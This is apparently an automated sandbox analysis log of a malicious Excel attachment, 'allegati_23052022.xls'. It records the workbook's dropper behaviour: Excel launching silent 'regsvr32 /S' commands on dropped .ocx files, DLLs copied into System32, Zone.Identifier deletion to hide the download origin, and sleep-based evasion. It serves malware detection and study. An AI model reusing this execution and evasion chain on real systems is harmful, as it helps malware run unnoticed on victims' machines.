                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A8405_2_000000018002A840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800038405_2_0000000180003840
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B4445_2_000000018000B444
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F0485_2_000000018000F048
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002AC4C5_2_000000018002AC4C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800100505_2_0000000180010050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800030505_2_0000000180003050
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000445C5_2_000000018000445C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C85C5_2_000000018000C85C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800034605_2_0000000180003460
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029C6C5_2_0000000180029C6C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001586C5_2_000000018001586C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000406C5_2_000000018000406C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E06C5_2_000000018000E06C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BC705_2_000000018000BC70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001447C5_2_000000018001447C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026C805_2_0000000180026C80
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180010C845_2_0000000180010C84
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800160885_2_0000000180016088
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800028885_2_0000000180002888
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017C8C5_2_0000000180017C8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FC8C5_2_000000018000FC8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002D0985_2_000000018002D098
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800154B85_2_00000001800154B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800064D05_2_00000001800064D0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800180D45_2_00000001800180D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800054D85_2_00000001800054D8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002CCE05_2_000000018002CCE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800254E45_2_00000001800254E4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800184E85_2_00000001800184E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800010E85_2_00000001800010E8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E8F05_2_000000018000E8F0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A0F85_2_000000018002A0F8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800199005_2_0000000180019900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800119045_2_0000000180011904
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001F9085_2_000000018001F908
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002490C5_2_000000018002490C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001890C5_2_000000018001890C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D5105_2_000000018001D510
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180003D185_2_0000000180003D18
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002191C5_2_000000018002191C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001D1285_2_000000018001D128
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D12C5_2_000000018000D12C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800149305_2_0000000180014930
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800085345_2_0000000180008534
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CD445_2_000000018001CD44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B9485_2_000000018000B948
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000796C5_2_000000018000796C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800105905_2_0000000180010590
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180028D945_2_0000000180028D94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800091A85_2_00000001800091A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800171B85_2_00000001800171B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180018DBC5_2_0000000180018DBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800141C85_2_00000001800141C8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B1D45_2_000000018002B1D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023DDC5_2_0000000180023DDC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029DF05_2_0000000180029DF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180015DF45_2_0000000180015DF4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800011F45_2_00000001800011F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000FE085_2_000000018000FE08
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180027E145_2_0000000180027E14
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000B6185_2_000000018000B618
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800232205_2_0000000180023220
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020A345_2_0000000180020A34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800076345_2_0000000180007634
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180022E385_2_0000000180022E38
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E6385_2_000000018000E638
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800102505_2_0000000180010250
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180011E5C5_2_0000000180011E5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180026A645_2_0000000180026A64
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800042645_2_0000000180004264
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800136745_2_0000000180013674
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F6785_2_000000018000F678
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E2785_2_000000018000E278
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180005E7C5_2_0000000180005E7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180025E885_2_0000000180025E88
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002868C5_2_000000018002868C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014E985_2_0000000180014E98
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180014AA45_2_0000000180014AA4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800126A85_2_00000001800126A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800036A85_2_00000001800036A8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002A6BC5_2_000000018002A6BC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001CABC5_2_000000018001CABC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EAC05_2_000000018000EAC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B6D45_2_000000018001B6D4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000F2DC5_2_000000018000F2DC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800202E05_2_00000001800202E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800226E05_2_00000001800226E0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180019AF05_2_0000000180019AF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000BEF05_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012EF85_2_0000000180012EF8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800297105_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800177105_2_0000000180017710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800163205_2_0000000180016320
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C7405_2_000000018000C740
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180020F445_2_0000000180020F44
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180023B485_2_0000000180023B48
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800237485_2_0000000180023748
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800217545_2_0000000180021754
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800223585_2_0000000180022358
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180029F5C5_2_0000000180029F5C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018002B3685_2_000000018002B368
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001BF705_2_000000018001BF70
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800253745_2_0000000180025374
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180007F745_2_0000000180007F74
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180021F7C5_2_0000000180021F7C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800197885_2_0000000180019788
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180001B8C5_2_0000000180001B8C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800283945_2_0000000180028394
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013B945_2_0000000180013B94
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001479C5_2_000000018001479C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000E7A05_2_000000018000E7A0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800087A45_2_00000001800087A4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180017BA85_2_0000000180017BA8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000EBAC5_2_000000018000EBAC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018001B3B85_2_000000018001B3B8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180012BB85_2_0000000180012BB8
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800257C05_2_00000001800257C0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180008BC05_2_0000000180008BC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_00000001800117C45_2_00000001800117C4
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 00000001800153F4 appears 47 times
                      Source: C:\Windows\System32\regsvr32.exeCode function: String function: 1000A57C appears 32 times
                      Source: allegati_23052022.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: allegati_23052022.xlsMacro extractor: Sheet name: PKEKPPGEKKPGE
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TURzt\TXqeznNbFanh.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KIMRaXPqDerXJoZF\aRgQEkQ.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IyXmToN\lzIgCVr.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TlAadbHyBMqq\YRFxrLtktkh.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\cusoa4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TURzt\TXqeznNbFanh.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\KIMRaXPqDerXJoZF\aRgQEkQ.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IyXmToN\lzIgCVr.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TlAadbHyBMqq\YRFxrLtktkh.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR784A.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@17/18@4/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10022ECC GetDiskFreeSpaceW,GetFullPathNameW,GetTempFileNameW,GetFileTime,SetFileTime,GetFileSecurityW,GetFileSecurityW,SetFileSecurityW,3_2_10022ECC
                      Source: allegati_23052022.xlsOLE indicator, Workbook stream: true
                      Source: allegati_23052022.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180029710 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,4_2_0000000180029710
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10009210 FindResourceW,LoadResource,FreeResource,3_2_10009210
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: allegati_23052022.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180006951 pushad ; retf 3_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180006951 pushad ; retf 5_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180006951 pushad ; retf 7_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180006951 pushad ; retf 9_2_0000000180006953
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10001010 GetModuleHandleW,LoadLibraryW,GetProcAddress,3_2_10001010
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\TURzt\TXqeznNbFanh.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\QqHRFPCw2sMluT[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\KIMRaXPqDerXJoZF\aRgQEkQ.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa4.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\TURzt\TXqeznNbFanh.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4bP[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\TlAadbHyBMqq\YRFxrLtktkh.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nB5U[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IyXmToN\lzIgCVr.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\KIMRaXPqDerXJoZF\aRgQEkQ.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\TURzt\TXqeznNbFanh.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\TlAadbHyBMqq\YRFxrLtktkh.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IyXmToN\lzIgCVr.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa4.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa2.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa4.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\cusoa2.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\TURzt\TXqeznNbFanh.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\KIMRaXPqDerXJoZF\aRgQEkQ.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\IyXmToN\lzIgCVr.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\TlAadbHyBMqq\YRFxrLtktkh.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1001F2AC IsWindowVisible,IsIconic,3_2_1001F2AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1000BB34 GetParent,IsIconic,GetParent,3_2_1000BB34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10035BBC IsIconic,SetForegroundWindow,SendMessageW,PostMessageW,3_2_10035BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1000DF60 IsIconic,GetWindowPlacement,GetWindowRect,3_2_1000DF60
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1001F2AC IsWindowVisible,IsIconic,4_2_1001F2AC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1000BB34 GetParent,IsIconic,GetParent,4_2_1000BB34
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10035BBC IsIconic,SetForegroundWindow,SendMessageW,PostMessageW,4_2_10035BBC
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1000DF60 IsIconic,GetWindowPlacement,GetWindowRect,4_2_1000DF60
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2104Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2028Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1336Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2224Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2452Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1716Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1244Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1720Thread sleep time: -300000s >= -30000sJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\QqHRFPCw2sMluT[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\4bP[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\LeBuXD3cUkeiPrfy[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\nB5U[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 2.3 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 2.4 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_1003036C GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,3_2_1003036C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_10030FE0 lstrlenW,FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,3_2_10030FE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_1003036C GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,4_2_1003036C
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_10030FE0 lstrlenW,FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,4_2_10030FE0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,4_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 6_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,6_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,8_2_000000018000BEF0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 10_2_000000018000BEF0 FindFirstFileW,FindNextFileW,FindClose,10_2_000000018000BEF0
